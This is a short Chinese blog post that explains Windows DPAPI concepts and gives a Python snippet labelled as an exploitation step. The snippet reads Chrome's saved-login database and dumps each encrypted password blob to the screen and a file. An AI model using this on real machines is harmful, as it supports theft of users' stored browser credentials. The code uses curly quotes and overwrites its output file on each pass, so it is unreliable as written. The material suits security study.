一、介绍

  DPAPI:全称Data Protection Application Programming Interface

  DPAPI blob:一段密文,可使用Master Key对其解密

  Master Key:64字节,用于解密DPAPI blob,使用用户登录密码、SID和16字节随机数加密后保存在Master Key file中

  Master Key file:二进制文件,可使用用户登录密码对其解密,获得Master Key

  PS:离线从Master Key file提取出Master Key,必须要获得用户的明文口令

二、利用过程

from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect(“Login Data”)
cursor = conn.cursor()
cursor.execute(‘SELECT action_url, username_value, password_value FROM logins’)
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
    f = open(‘test.txt’, ‘wb’)
    f.write(result[2])
    f.close()

 

 

 

版权声明:本文为websecyw原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/websecyw/p/12758870.html